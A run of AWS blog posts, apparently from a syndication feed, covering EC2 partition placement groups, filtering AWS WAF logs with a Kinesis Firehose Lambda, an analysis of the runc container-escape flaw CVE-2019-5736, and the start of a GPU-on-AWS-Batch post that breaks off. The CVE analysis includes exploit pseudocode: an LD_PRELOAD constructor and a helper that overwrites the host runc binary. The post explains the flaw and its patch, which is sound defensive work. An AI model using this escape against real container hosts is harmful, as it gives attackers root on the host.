This post is contributed by Ankit Jain – Sr. Product Manager, Amazon EC2 and Harsha Warrdhan Sharma – Global Account Solutions Architect at AWS

Before we introduced partition placement groups, customers deployed large distributed and replicated workloads across multiple Availability Zones to reduce correlated failures. This new Amazon EC2 placement strategy helps reduce the likelihood of correlated failures for workloads such as Hadoop, HBase, Cassandra, Kafka, and Aerospike running on EC2.

While Multi-AZ deployment offers high availability, some workloads are more sensitive to internode latency and could not be deployed across multiple zones. With partition placement groups, you can now deploy these workloads within a single zone and reduce the likelihood of correlated failures, improving your application performance and availability.

Placement group overview

Placement groups enable you to influence how your instances are placed on the underlying hardware. EC2 offers different types of placement groups to address different types of workloads. Use cluster placement groups to give applications the low-latency network performance necessary for the tightly coupled node-to-node communication typical of many HPC applications. Or, use spread placement groups to place a small number of critical instances on distinct racks, reducing correlated failures for your applications.

While spread placement groups work well for small workloads, customers wanted a way to reduce correlated failures for large distributed and replicated workloads that required hundreds of EC2 instances. They also wanted visibility into how instances are placed relative to each other on the underlying hardware. To address these needs, we introduced partition placement groups.

How partition placement groups work

To isolate the impact of hardware faults, EC2 subdivides each partition placement group into logical segments called partitions. EC2 ensures that no two partitions within a placement group share the same racks. The following diagram shows a partition placement group in a single zone:

Applications such as Hadoop, HBase, Cassandra, Kafka, and Aerospike have replicated nodes for fault tolerance and use the topology information to make intelligent data storage decisions. With partition placement groups, EC2 can place the replicated nodes across separate racks in a zone and isolate the risk of hardware failure to only one node. In addition, partition placement groups offer visibility into the partitions that allows these rack-aware applications to make intelligent data replication decisions, increasing data availability and durability.

Deploying applications using partition placement groups

Here’s an example of how to use a partition placement group through the AWS Management Console or AWS CLI.

First, in the console, choose EC2, Placement Group, create a partition placement group, and then define the number of partitions within that placement group. When creating a partition placement group, we recommend matching the number of partitions to the replication factor of your application. For instance, if a Hadoop cluster has a replication factor of 3, define a partition placement group with three partitions.

You can also run the following AWS CLI command to perform the same action:

aws ec2 create-placement-group --group-name HDFS-GROUP-A --strategy partition --partition-count 3

After defining the placement group, launch the desired number of EC2 instances into this placement group from the EC2 launch instance wizard.

If you specify Auto distribution for the Target partition field at the time of launch, EC2 tries to evenly distribute all instances across the partitions. For example, a node might consist of 100 EC2 instances and there could be three such replicated nodes in your application. You can launch 300 EC2 instances, select the partition placement group, and keep Auto distribution as the default. Each partition then has approximately 100 instances, with each partition running on a separate group of racks.

Run the following command (auto distribution is the default behavior):

aws ec2 run-instances --placement "GroupName = HDFS-GROUP-A" --count 300

Alternatively, you can specify a target partition number at launch. As your workload grows, this feature makes it easy to maintain the placement group. You can replace instances in a specified partition or add more instances to a specified partition, using the Target partition field.

Run the following command and specify PartitionNumber:

aws ec2 run-instances --placement "GroupName = HDFS-GROUP-A, PartitionNumber = 1" --count 100

After you launch the EC2 instances, you can view the partition number associated with each instance. For these rack-aware applications, you can now treat the partition number associated with instances as rack-ids and pass this information to the application. The application can then use this topology information to decide the replication model to improve the application performance and data reliability. View this information in the console by filtering by placement group name or by the partition number.

Run the following command:

aws ec2 describe-instances --filters "Name=placement-group-name,Values = HDFS-GROUP-A,Name=placement-partition-number,Values = 1" 

Conclusion

Partition placement groups provide you with a way to reduce the likelihood of correlated failures for large workloads. This allows you to run applications like Hadoop, HBase, Cassandra, Kafka, and Aerospike within a single Availability Zone. By deploying these applications within a single zone, you can benefit from the lower latency offered within a zone, improving the application performance. Partition placement groups also offer elasticity, allowing you to run any number of instances within the placement group. For more information, see Partition Placement Groups.

Trimming AWS WAF logs with Amazon Kinesis Firehose transformations

Post Syndicated from Tino Tran original https://aws.amazon.com/blogs/security/trimming-aws-waf-logs-with-amazon-kinesis-firehose-transformations/

In an earlier post, Enabling serverless security analytics using AWS WAF full logs, Amazon Athena, and Amazon QuickSight, published on March 28, 2019, the authors showed you how to stream WAF logs with Amazon Kinesis Firehose for visualization using QuickSight. This approach used no filtering of the logs so that you could visualize the full data set. However, you are often only interested in seeing specific events. Or you might be looking to minimize log size to save storage costs. In this post, I show you how to apply rules in Amazon Kinesis Firehose to trim down logs. You can then apply the same visualizations you used in the previous solution.

AWS WAF is a web application firewall that supports full logging of all the web requests it inspects. For each request, AWS WAF logs the raw HTTP/S headers along with information on which AWS WAF rules were triggered. Having complete logs is useful for compliance, auditing, forensics, and troubleshooting custom and Managed Rules for AWS WAF. However, for some use cases, you might not want to log all of the requests inspected by AWS WAF. For example, to reduce the volume of logs, you might only want to log the requests blocked by AWS WAF, or you might want to remove certain HTTP header or query string parameter values from your logs. In many cases, unblocked requests are often already stored in your CloudFront access logs or web server logs and, therefore, using AWS WAF logs can result in redundant data for these requests, while logging blocked traffic can help you to identify bad actors or root cause false positives.

In this post, I’ll show you how to create an Amazon Kinesis Data Firehose stream to filter out unneeded records, so that you only retain log records for requests that were blocked by AWS WAF. From here, the logs can be stored in Amazon S3 or directed to SIEM (Security information and event management) and log analysis tools.

To simplify things, I’ll provide you with a CloudFormation template that will create the resources highlighted in the diagram below:

Figure 1: Solution architecture

  1. A Kinesis Data Firehose delivery stream is used to receive log records from AWS WAF.
  2. An IAM role for the Kinesis Data Firehose delivery stream, with permissions needed to invoke Lambda and write to S3.
  3. A Lambda function used to filter out WAF records matching the default action before the records are written to S3.
  4. An IAM role for the Lambda function, with the permissions needed to create CloudWatch logs (for troubleshooting).
  5. An S3 bucket where the WAF logs will be stored.

Prerequisites and assumptions

  • In this post, I assume that the AWS WAF default action is configured to allow requests that don’t explicitly match a blocking WAF rule. So I’ll show you how to omit any records matching the WAF default action.
  • You need to already have an AWS WAF WebACL created. In this example, you’ll use a WebACL generated from the AWS WAF OWASP 10 template. For more information on deploying AWS WAF to a CloudFront or ALB resource, see the Getting Started page.

Step 1: Create a Kinesis Data Firehose delivery stream for AWS WAF logs

In this step, you’ll use the following CloudFormation template to create a Kinesis Data Firehose delivery stream that writes logs to an S3 bucket. The template also creates a Lambda function that omits AWS WAF records matching the default action.

Here’s how to launch the template:

  1. Open CloudFormation in the AWS console.
  2. For WAF deployments on Amazon CloudFront, select region US-EAST-1. Otherwise, create the stack in the same region in which your AWS WAF Web ACL is deployed.
  3. Select the Create Stack button.
  4. In the CloudFormation wizard, select Specify an Amazon S3 template URL and copy and paste the following URL into the text box, then select Next:
    https://s3.amazonaws.com/awsiammedia/public/sample/TrimAWSWAFLogs/KinesisWAFDeliveryStream.yml
  5. On the options page, leave the default values and select Next.
  6. Specify the following and then select Next:
    1. Stack name: (for example, kinesis-waf-logging). Make sure to note your stack name, as you’ll need to provide it later in the walkthrough.
    2. Buffer size: This value specifies the size in MB for which Kinesis will buffer incoming records before processing.
    3. Buffer interval: This value specifies the interval in seconds for which Kinesis will buffer incoming records before processing.

    Note: Kinesis will trigger data delivery based on whichever buffer condition is satisfied first. This CloudFormation template sets the default buffer size to 3 MB and the buffer interval to 900 seconds, matching the maximum transformation buffer size and interval that it configures. To learn more about Kinesis Data Firehose buffer conditions, read this documentation.

    Figure 2: Specify the stack name, buffer size, and buffer interval

  7. Select the check box for I acknowledge that AWS CloudFormation might create IAM resources and choose Create.
  8. Wait for the template to finish creating the resources. This will take a few minutes. On the CloudFormation dashboard, the status next to your stack should say CREATE_COMPLETE.
  9. From the AWS Management Console, open Amazon Kinesis and find the Data Firehose delivery stream on the dashboard. Note that the name of the stream will start with aws-waf-logs- and end with the name of the CloudFormation stack. This prefix is required in order to configure AWS WAF to write logs to the Kinesis stream.
  10. From the AWS Management Console, open AWS Lambda and view the Lambda function created from the CloudFormation template. The function name should start with the Stack name from the CloudFormation template. I included the function code generated from the CloudFormation template below so you can see what’s going on.

    Note: Through CloudFormation, the code is deployed without indentation. To format it for readability, I recommend using the code formatter built into Lambda under the edit tab. This code can easily be modified for custom record filtering or transformations.

    
        'use strict';
    
        exports.handler = (event, context, callback) => {
            /* Process the list of records and drop those containing Default_Action */
            const output = event.records.map((record) => {
                const entry = (new Buffer(record.data, 'base64')).toString('utf8');
                if (!entry.match(/Default_Action/g)){
                    return {
                        recordId: record.recordId,
                        result: 'Ok',
                        data: record.data,
                    };
                } else {
                    return {
                        recordId: record.recordId,
                        result: 'Dropped',
                        data: record.data,
                    };
                }
            });
        
            console.log(`Processing completed.  Successful records ${output.length}.`);
            callback(null, { records: output });
        };"        
        

You now have a Kinesis Data Firehose stream that AWS WAF can use for logging records.

Cost Considerations

This template sets the Kinesis transformation buffer size to 3MB and buffer interval to 900 seconds (the maximum values) in order to reduce the number of Lambda invocations used to process records. On average, an AWS WAF record is approximately 1-1.5KB. With a buffer size of 3MB, Kinesis will use 1 Lambda invocation per 2000-3000 records. Visit the AWS Lambda website to learn more about pricing.

Step 2: Configure AWS WAF Logging

Now that you have an active Amazon Kinesis Firehose delivery stream, you can configure your AWS WAF WebACL to turn on logging.

  1. From the AWS Management Console, open WAF & Shield.
  2. Select the WebACL for which you would like to enable logging.
  3. Select the Logging tab.
  4. Select the Enable Logging button.
  5. Next to Amazon Kinesis Data Firehose, select the stream that was created from the CloudFormation template in Step 1 (for example, aws-waf-logs-kinesis-waf-stream) and select Create.

Congratulations! Your AWS WAF WebACL is now configured to send records of requests inspected by AWS WAF to Kinesis Data Firehose. From there, records that match the default action will be dropped, and the remaining records will be stored in S3 in JSON format.
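
If you would rather script this step, logging can also be enabled with a single CLI call. The sketch below assumes a global (CloudFront-associated) WebACL and uses placeholder ARNs; for a regional WebACL, the waf-regional command is the equivalent:

# Enable AWS WAF logging to the Kinesis Data Firehose delivery stream
# (both ARNs are placeholders)
aws waf put-logging-configuration \
  --logging-configuration '{"ResourceArn":"<web-acl-arn>","LogDestinationConfigs":["<firehose-delivery-stream-arn>"]}'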

Below is a sample of the logs generated from this example. Notice that there are only blocked records in the logs.

Figure 3: Sample logs

Conclusion

In this blog, I’ve provided you with a CloudFormation template to generate a Kinesis Data Firehose stream that can be used to log requests blocked by AWS WAF, omitting requests matching the default action. By omitting the default action, I have reduced the number of log records that must be reviewed to identify bad actors, tune new WAF rules, and/or root cause false positives. For unblocked traffic, consider using CloudFront’s access logs with Amazon Athena or CloudWatch Logs Insights to query and analyze the data. To learn more about AWS WAF logs, read our developer guide for AWS WAF.

If you have feedback about this blog post, please submit it in the Comments section below. If you have issues with AWS WAF, start a thread on the AWS WAF forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Tino Tran

Tino is a Senior Edge Specialized Solutions Architect based out of Florida. His main focus is to help companies deliver online content in a secure, reliable, and fast way using AWS Edge Services. He is an experienced technologist with a background in software engineering, content delivery networks, and security.

Anatomy of CVE-2019-5736: A runc container escape!

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/anatomy-of-cve-2019-5736-a-runc-container-escape/

This post is courtesy of Samuel Karp, Senior Software Development Engineer — Amazon Container Services.

On Monday, February 11, CVE-2019-5736 was disclosed.  This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc.  But how does it work?  Dive in!

This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.

A review of Linux process management

Before I explain the vulnerability, here’s a review of some Linux basics.

  • Processes and syscalls
  • What is /proc?
  • Dynamic linking

Processes and syscalls

Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes.  Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.

Processes interact with the operating system to perform a variety of operations (for example, reading and writing files, taking input, communicating on the network, etc.) via system calls, or syscalls.  Syscalls can perform a variety of actions. The ones I’m interested in today involve creating other processes (typically through fork(2) or clone(2)) and changing the currently running program into something else (execve(2)).

File descriptors are how a process interacts with files, as managed by the Linux kernel.  File descriptors are short identifiers (numbers) that are passed to the appropriate syscalls for interacting with files: read(2), write(2), close(2), and so forth.

Sometimes a process wants to spawn another process.  That might be a shell running a program you typed at the terminal, a daemon that needs a helper, or even concurrent processing without threads.  When this happens, the process typically uses the fork(2) or clone(2) syscalls.

These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state.  That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.

After the new process is started, it’s the responsibility of both processes to figure out which one they are (am I the parent? Am I the child?). Then, they take the appropriate action.  In many cases, the appropriate action is for the child to do some setup, and then execute the execve(2) syscall.

The following example shows the use of fork(2), in pseudocode:

func main() {
    child_pid = fork();
    if (child_pid > 0) {
        // This is the parent process, since child_pid is the pid of the child
        // process.
    } else if (child_pid == 0) {
        // This is the child process. It can retrieve its own pid via getpid(2),
        // if desired.  This child process still sees all the variables in memory
        // and all the open file descriptors.
    }
}

The execve(2) syscall instructs the Linux kernel to replace the currently executing program with another program, in-place.  When called, the Linux kernel loads the new executable as specified and passes the specified arguments.  Because this is done in place, the pid is preserved and a variety of other contextual information is carried over, including environment variables, the current working directory, and any open files.

func main() {
    // execl(3) is a wrapper around the execve(2) syscall that accepts the
    // arguments for the executed program as a list.
    // The first argument to execl(3) is the path of the executable to
    // execute, which in this case is the pwd(1) utility for printing out
    // the working directory.
    // The next argument to execl(3) is the first argument passed through
    // to the new program (in a C program, this would be the first element
    // of the argv array, or argv[0]).  By convention, this is the same as
    // the path of the executable.
    // The remaining arguments to execl(3) are the other arguments visible
    // in the new program's argv array, terminated by NULL.  As you're
    // not passing any additional arguments, just pass NULL here.
    execl("/bin/pwd", "/bin/pwd", NULL);
    // Nothing after this point executes, since the running process has been
    // replaced by the new pwd(1) program.
}

Wait…open files?  By default, open files are passed across the execve(2) boundary.  This is useful in cases where the new program can’t open the file, for example if there’s a new mount covering the existing path.  This is also the mechanism by which the standard I/O streams (stdin, stdout, and stderr) are made available to the new program.

While convenient in some use cases, preserving open file descriptors in the new program isn't always what you want. This behavior can be changed by passing the O_CLOEXEC flag to open(2) when opening the file or by setting the FD_CLOEXEC flag with fcntl(2).  Using O_CLOEXEC or FD_CLOEXEC (both short for close-on-exec) prevents the new program from having access to the file descriptor.

func main() {
    // open(2) opens a file.  The first argument to open is the path of the file
    // and the second argument is a bitmask of flags that describe options
    // applied to the file that's opened.  open(2) then returns a file
    // descriptor, which can be used in subsequent syscalls to represent this
    // file.
    // For this example, open /dev/urandom, which is a file containing random
    // bytes.  Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY indicates that
    // the file should be open for reading but not writing, and O_CLOEXEC
    // indicates that the file descriptor should not pass through the execve(2)
    // boundary.
    fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    // All valid file descriptors are non-negative integers, so a returned value < 0
    // indicates that an error occurred.
    if (fd < 0) {
        // error() stands in for perror(3), a function to print out the last
        // error that occurred.
        error("could not open /dev/urandom");
        // exit(3) causes a process to exit with a given exit code. Return 1
        // here to indicate that an error occurred.
        exit(1);
    }
}

What is /proc?

/proc (or proc(5)) is a pseudo-filesystem that provides access to a number of Linux kernel data structures.  Every process in Linux has a directory available for it called /proc/[pid].  This directory stores a bunch of information about the process, including the arguments it was given when the program started, the environment variables visible to it, and the open file descriptors.

The special files inside /proc/[pid]/fd describe the file descriptors that the process has open.  They look like symbolic links (symlinks), and you can see the original path of the file, but they aren’t exactly symlinks. You can pass them to open(2) even if the original path is inaccessible and get another working file descriptor.
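
A small sketch shows a descriptor being reopened through its /proc entry (here /etc/hostname is purely a stand-in for any file):

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    char path[64];

    // Open any file; /etc/hostname is just a placeholder for illustration.
    int fd = open("/etc/hostname", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Build the /proc path that describes the descriptor we already hold...
    snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);

    // ...and open it again.  This succeeds even if the original path has
    // since been renamed, unlinked, or hidden behind a new mount.
    int fd2 = open(path, O_RDONLY);
    if (fd2 < 0) {
        perror("reopen via /proc/self/fd");
        close(fd);
        return 1;
    }
    printf("original descriptor: %d, reopened descriptor: %d\n", fd, fd2);

    close(fd2);
    close(fd);
    return 0;
}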

Another file inside /proc/[pid] is called exe. This file is like the ones in /proc/[pid]/fd except that it points to the binary program that is executing inside that process.

/proc/[pid] also has a companion directory, /proc/self.  This directory is always the same as /proc/[pid] of the process that is accessing it. That is, you can always read your own /proc data from /proc/self without knowing your pid.
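
Putting those two pieces together, a short C sketch (not part of the exploit, just an illustration) lets a process discover its own executable path through /proc/self:

#include <stdio.h>
#include <unistd.h>

int main(void) {
    char target[4096];

    // readlink(2) on /proc/self/exe reports the path of the binary that this
    // process is currently executing, without needing to know its own pid.
    ssize_t len = readlink("/proc/self/exe", target, sizeof(target) - 1);
    if (len < 0) {
        perror("readlink");
        return 1;
    }
    target[len] = '\0';
    printf("this process is running %s\n", target);
    return 0;
}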

Dynamic linking

When writing programs, software developers typically use libraries—collections of previously written code intended to be reused.  Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.

In the code examples above, you can see library use in the calls to functions like fork and execl, which are provided by the C library as wrappers around the underlying syscalls.

Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition.  On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.

Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or address security concerns.  In contrast, static linking requires re-compiling and re-linking each program that uses a given library to effect the same change.

On Linux, runtime linking is typically performed by ld-linux.so(8), which is provided by the GNU project toolchain.  Dynamically linked libraries are specified by a name embedded into the compiled binary.  This dynamic linker reads those names and then performs a search across a standard set of paths to find the associated library file (a shared object file, or .so).

The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH environment variable.  The LD_PRELOAD environment variable can tell the linker to load additional, user-specified libraries before all others. This is useful in debugging scenarios to allow selective overriding of symbols without having to rebuild a library entirely.
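
To make the LD_PRELOAD mechanism concrete, here is a minimal, hypothetical example (the file name, library name, and the choice of overriding rand() are all just for illustration) that replaces a single libc function:

// fake_rand.c: a tiny, hypothetical preload library for illustration.
// Build it as a shared object and inject it into another program with:
//   gcc -shared -fPIC -o fake_rand.so fake_rand.c
//   LD_PRELOAD=./fake_rand.so ./some_program
// Any call that program makes to rand() now resolves to this definition
// before the one provided by libc.
int rand(void) {
    return 4;  // a fixed value, so the override is easy to observe
}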

The vulnerability

Now that the cast of characters is set (fork(2), execve(2), open(2), proc(5), file descriptors, and linking), I can start talking about the vulnerability in runc.

runc is a container runtime.  Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”

The primary mechanism for setting up some of these resources, like namespaces, is through flags to the clone(2) syscall that take effect in the new process.  The target of the final execve(2) call is the program the user requested.  With a container, that target can be specified in the container image or through explicit arguments.

The CVE announcement states:

The vulnerability allows a malicious container to […] overwrite the host runc binary […].  The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.

The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…).  Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.

Don’t containers protect against this?

Containers are, in many ways, intended to isolate the host from a given workload or to isolate a given workload from the host.  One of the main mechanisms for doing this is through a separate view of the filesystem.  With a separate view, the container shouldn’t be able to access the host’s files and should only be able to see its own.  runc accomplishes this using a mount namespace and mounting the container image’s root filesystem as /.  This effectively hides the host’s filesystem.

Even with techniques like this, things can pass through the mount namespace.  For example, the /proc/cmdline file contains the running Linux kernel’s command-line parameters.  One of those parameters typically indicates the host’s root filesystem, and a container with enough access (like CAP_SYS_ADMIN) can remount the host’s root filesystem within the container’s mount namespace.

That’s not what I’m talking about today, as that requires non-default privileges to run.  The interesting thing today is that the /proc filesystem exposes a path to the original program’s file, even if that file is not located in the current mount namespace.

What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere.  In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.

runc must be able to perform a number of operations that require elevated privileges, even if your container is limited to a much smaller set of privileges. For example, namespace creation and mounting both require the elevated capability CAP_SYS_ADMIN, and configuring the network requires the elevated capability CAP_NET_ADMIN. You might see a pattern here.

An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace.  Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.

However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.

So, /proc exposes a path to the original program’s file, and the process that starts the container runs as root.  What if that original program is something important that you knew would run again… like runc?

Exploiting it!

runc’s job is to run commands that you specify.  What if you specified /proc/self/exe?  It would cause runc to spawn a copy of itself, but running inside the context of the container, with the container’s namespaces, root filesystem, and so on.  For example, you could run the following command:

docker run --rm amazonlinux:2 /proc/self/exe

This, by itself, doesn’t get you far—runc doesn’t hurt itself.

Generally, runc is dynamically linked against some libraries that provide implementations for seccomp(2), SELinux, or AppArmor.  If you remember from earlier, ld-linux.so(8) searches a standard set of file paths to provide these implementations at runtime.  If you start runc again inside the container’s context, with its separate filesystem, you have the opportunity to provide other files in place of the expected library files. These can run your own code instead of the standard library code.

There’s an easier way, though.  Instead of having to make something that looks like (for example) libseccomp, you can take advantage of a different feature of the dynamic linker: LD_PRELOAD.  And because runc lets you specify environment variables along with the path of the executable to run, you can specify this environment variable, too.

With LD_PRELOAD, you can specify your own libraries to load first, ahead of the other libraries that get loaded.  Because the original libraries still get loaded, you don’t actually have to have a full implementation of their interface.  Instead, you can selectively override some common functions that you might want and omit others that you don’t.

So now you can inject code through LD_PRELOAD and you have a target to inject it into: runc, by way of /proc/self/exe.  For your code to get run, something must call it.  You could search for a target function to override, but that means inspecting runc’s code to figure out what could get called and how.  Again, there’s an easier way.  Dynamic libraries can specify a “constructor” that is run immediately when the library is loaded.

Using the “constructor” along with LD_PRELOAD and specifying the command as /proc/self/exe, you now have a way to inject code and get it to run.  That’s it, right?  You can now write to /proc/self/exe and overwrite runc!

Not so fast.

The Linux kernel does have a bit of a protection mechanism to prevent you from overwriting the currently running executable.  If you try to open /proc/self/exe for writing, the open fails with ETXTBSY.  This error code indicates that the file is busy, where “TXT” refers to the text (code) section of the binary.
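
You can see that protection in a short sketch that simply tries to open its own executable for writing:

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    // Attempting to open the currently running executable for writing is
    // rejected by the kernel with ETXTBSY ("text file busy").
    int fd = open("/proc/self/exe", O_WRONLY);
    if (fd < 0 && errno == ETXTBSY) {
        printf("as expected, open failed: %s\n", strerror(errno));
        return 0;
    }
    printf("unexpectedly got descriptor %d\n", fd);
    return 1;
}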

You know from earlier that execve(2) is a mechanism to replace the currently running executable with another, which means that the original executable isn’t in use anymore.  So instead of just having a single library that you load with LD_PRELOAD, you also must have another executable that can do the dirty work for you, which you can execve(2).

Normally, doing this would still be unsuccessful due to file permissions. Executables are typically not world-writable.  But because runc runs as root and does not change users, the new runc process that you started through /proc/self/exe and the helper program that you executed are also run as root.

After you gain write access to the runc file descriptor and you’ve replaced the currently executing program with execve(2), you can replace runc’s content with your own.  The other software on the system continues to start runc as part of its normal operation (for example, creating new containers, stopping containers, or performing exec operations inside containers). Your code has the chance to operate instead of runc.  When it gets run this way, your code runs as root, in the host’s context instead of in the container’s context.

Now you’re done!  You’ve successfully escaped the container and have full root access.

Putting that all together, you get something like the following pseudocode:

Preload pseudocode for preload.so

func constructor(){
    // /proc/self/exe is a virtual file pointing to the currently running
    // executable.  Open it here so that it can be passed to the next
    // process invoked.  It must be opened read-only, or the kernel will fail
    // the open syscall with ETXTBSY.  You cannot gain write access to the text
    // portion of a running executable.
    fd = open("/proc/self/exe", O_RDONLY);
    if (fd < 0) {
        error("could not open /proc/self/exe");
        exit(1);
    }
    // /proc/self/fd/%d is a virtual file representing the open file descriptor
    // to /proc/self/exe, which you opened earlier.
    filename = sprintf("/proc/self/fd/%d", fd);
    // execl is a call that executes a new executable, replacing the
    // currently running process and preserving aspects like the process ID.
    // Execute the "rewrite" binary, passing it arguments representing the
    // path of the open file descriptor. Because you did not pass O_CLOEXEC when
    // opening the file, the file descriptor remains open in the replacement
    // program and retains the same descriptor.
    execl("/rewrite", "/rewrite", filename, NULL);
    // execl never returns, except on an error
    error("couldn't execl");
}

Pseudocode for the rewrite program

// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents.  rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
    fd = 0;
    printf("Running\n");
    for(tries = 0; tries < 10000; tries++) {
        // argv[1] is the argument that contains the path to the virtual file
        // of the read-only file descriptor
        fd = open(argv[1], O_RDWR|O_TRUNC);
        if( fd >= 0 ) {
            printf("open succeeded\n");
            break;
        } else {
            if(errno != ETXTBSY) {
                // You expect a lot of ETXTBSY, so only print when you get something else
                error("open");
            }
        }
    }
    if (fd < 0) {
        error("exhausted all open attempts");
        exit(1);
    }
    dprintf(fd, "CVE-2019-5736\n");
    printf("wrote over runc!\n");
    fflush(stdout);
}

The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.

How does the patch work?

If you try the same approach with a patched runc, you instead see that opening the file with O_RDWR is denied.  This means that the patch is working!

The runc patch operates by taking advantage of some Linux kernel features introduced in kernel 3.17, specifically a syscall called memfd_create(2).  This syscall creates a temporary memory-backed file and a file descriptor that can be used to access the file.  The file has some special semantics: it is automatically removed when the last reference to it is dropped, and because it lives in memory, removal just means freeing the memory.  It also supports another useful feature: file sealing.  File sealing allows the file to be made immutable, even to processes that are running as root.
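
The following is a minimal sketch of that kernel mechanism using memfd_create(2) and file sealing; it illustrates the feature itself, not runc's actual patch code, and assumes a reasonably recent glibc that provides the memfd_create wrapper (the name "sealed-copy" and the payload are placeholders):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void) {
    // Create an anonymous, memory-backed file that allows sealing.
    int fd = memfd_create("sealed-copy", MFD_CLOEXEC | MFD_ALLOW_SEALING);
    if (fd < 0) {
        perror("memfd_create");
        return 1;
    }

    // Fill it with some content (a stand-in for copying a binary into it).
    const char payload[] = "pretend this is a copy of a binary\n";
    if (write(fd, payload, sizeof(payload) - 1) < 0) {
        perror("write");
        return 1;
    }

    // Seal the file so it can no longer be modified, even by root.
    if (fcntl(fd, F_ADD_SEALS,
              F_SEAL_SEAL | F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE) < 0) {
        perror("fcntl(F_ADD_SEALS)");
        return 1;
    }

    // Any further attempt to write now fails (with EPERM).
    if (write(fd, "x", 1) < 0) {
        perror("write after sealing");
    }
    return 0;
}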

The runc patch changes the behavior of runc so that it creates a copy of itself in one of these temporary file descriptors, and then seals it.  The next time a process launches (via fork(2)) or a process is replaced (via execve(2)), /proc/self/exe will be this sealed, memory-backed file descriptor.  When your rewrite program attempts to modify it, the Linux kernel prevents it as it’s a sealed file.

Could I have avoided being vulnerable?

Yes, a few different mechanisms were available before the patch that mitigated this vulnerability.  The one that I mentioned earlier is user namespaces: mapping the container's root user to an unprivileged user outside the container means that normal Linux file permissions effectively prevent the runc binary from becoming writable, because the compromised process inside the container is not running as the real root user.

Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only.  A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.

SELinux, when correctly configured, may also prevent this vulnerability.

A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation.  This is typically accomplished using a hypervisor or a virtual machine.

Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these.  Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust.  Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.

Further reading

The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other approaches they attempted along the way.

Acknowledgements

I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly.  I’d also like to thank the Amazonians who made it possible for AWS customers to be protected:

  • AWS Security who ran the whole process
  • Clare Liguori, Onur Filiz, Noah Meyerhans, iliana weller, and Tom Kirchner who performed analysis and validation of the patch
  • The Amazon Linux team (and iliana weller specifically) who backported the patch and built new Docker RPMs
  • The Amazon ECS, Amazon EKS, and AWS Fargate teams for making patched infrastructure available quickly
  • And all of the other AWS teams who put in extra effort to protect AWS customers

GPU workloads on AWS Batch

Post Syndicated from Josh Rad original https://aws.amazon.com/blogs/compute/gpu-workloads-on-aws-batch/

Contributed by Manuel Manzano Hoss, Cloud Support Engineer

I remember playing around with graphics processing unit (GPU) workload examples in 2017 when the Deep Learning on AWS Batch post was published by my colleague Kiuk Chung. He provided an example of how to train a convolutional neural network (CNN), the LeNet architecture, to recognize handwritten digits from the MNIST dataset using Apache MXNet as the framework. Back then, to run such jobs with GPU capabilities, I had to do the following:

  • Create a custom GPU-enabled AMI that had Docker, the ECS agent, the NVIDIA driver and container runtime, and CUDA installed.
  • Identify the type of P2 EC2 instance that had the required number of GPUs for my job.
  • Check the number of vCPUs that it offered (even if I was not interested in using them).
  • Specify that number of vCPUs for my job.

